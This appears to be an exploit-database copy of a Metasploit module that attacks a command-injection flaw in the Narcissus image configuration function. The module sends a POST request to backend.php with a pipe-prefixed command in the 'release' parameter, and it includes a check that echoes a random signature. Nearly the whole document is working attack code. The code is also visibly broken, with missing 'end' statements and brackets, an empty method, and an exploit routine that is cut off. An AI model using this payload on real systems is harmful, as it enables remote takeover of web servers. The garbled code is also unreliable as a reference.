Narcissus Image Configuration Passthru Vulnerability

Author: sinn3r Published: 2012-11-22 Verified: Verified



# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
 Rank = ExcellentRanking

 include Msf::Exploit::Remote::HttpClient

 def initialize(info={})
   'Name'           => "Narcissus Image Configuration Passthru Vulnerability",
   'Description'    => %q{
     This module exploits a vulnerability found in Narcissus image configuration
    function.  This is due to the backend.php file not handling the $release parameter
    properly, and then passes it on to the configure_image() function.  In this
    function, the $release parameter can be used to inject system commands for
    passthru (a PHP function that's meant to be used to run a bash script by the
    vulnerable application), which allows remote code execution under the context
    of the web server.
   'License'        => MSF_LICENSE,
   'Author'         =>
     'Dun',    #Original
     'sinn3r'  #Metasploit
   'References'     =>
     [ 'EDB', '22709' ],
     [ 'BID', '87410' ]
   'Payload'        =>
     'BadChars' => "\x00\x0d\x0a"
   'Platform'       => ['unix', 'linux'],
   'Arch'           => ARCH_CMD,
   'Compat'         =>
     'PayloadType' => 'cmd',
     'RequiredCmd' => 'generic perl ruby python bash netcat-e'
   'Targets'        =>
     ['Narcissus', {}]
   'Privileged'     => false,
   'DisclosureDate' => "Nov 14 2012",
   'DefaultTarget'  => 0))

   ['TARGETURI', [true, 'The URI path to the web application', '/narcissus-master/'])
   ], self.class)

 def base
  uri = target_uri.path
  uri << '/' if uri[-1,1] != '/'
  return uri

 def peer

 def remote_exe(command)
  res = send_request_cgi({
   'uri'      => "#{base}backend.php",
   'method'   => 'POST',
   'encode_params' => false,
   'vars_post' => {
    'machine' => '0',
    'action'  => 'configure_image',
    'release' => "|#{command}"

  vprint_line(res.body) if res
  return res

 def check
  sig = rand_text_alpha(rand(10) + 5)  #The string to check

  print_status("#{peer} - Looking for signature '#{sig}'...")
  res = remote_exe("echo #{sig}")

  if res and res.body =~ /#{sig}/
   print_status("#{peer} - Signature '#{sig}' found.")
   return Exploit::CheckCode::Vulnerable
   print_status("#{peer} - Signature not found")
   return Exploit::CheckCode::Safe

 def exploit
  print_status("#{peer} - Sending malicious request...")
